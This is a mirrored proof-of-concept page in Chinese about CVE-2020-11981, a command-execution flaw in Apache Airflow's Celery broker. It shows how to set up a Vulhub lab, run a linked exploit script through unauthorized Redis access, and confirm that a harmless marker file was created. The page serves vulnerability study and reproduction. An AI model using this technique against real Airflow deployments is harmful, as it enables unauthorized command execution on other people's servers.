admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Apache Airflow Celery 消息中间件命令执行 CVE-2020-11981.md

55 lines
1.6 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Apache Airflow Celery 消息中间件命令执行 CVE-2020-11981
## 漏洞描述
Apache Airflow是一款开源的分布式任务调度框架。在其1.10.10版本及以前如果攻击者控制了Celery的消息中间件如Redis/RabbitMQ将可以通过控制消息在Worker进程中执行任意命令。
由于启动的组件比较多可能会有点卡运行此环境可能需要准备2G以上的内存。
参考链接:
- https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx
- [apache/airflow#9178](https://github.com/apache/airflow/pull/9178)
## 环境搭建
Vulhub依次执行如下命令启动Apache Airflow 1.10.10
```
#初始化数据库
docker-compose run airflow-init
#启动服务
docker-compose up -d
```
## 漏洞复现
利用这个漏洞需要控制消息中间件Vulhub环境中Redis存在未授权访问。通过未授权访问攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令,参数为命令执行中所需要的数组。
使用[exploit_airflow_celery.py](https://github.com/vulhub/vulhub/blob/master/airflow/CVE-2020-11981/exploit_airflow_celery.py)这个脚本来执行命令`touch /tmp/airflow_celery_success`
```
pip install redis
python exploit_airflow_celery.py [your-vps-ip]
```
查看日志:
```
docker-compose logs airflow-worker
```
可以看到如下信息:
![image-20220329100933012](images/202204251947997.png)
```
docker-compose exec airflow-worker ls -l /tmp
```
可以看到成功创建了文件`airflow_celery_success`
![image-20220329101045692](images/202204251947998.png)
Reference in New Issue Copy Permalink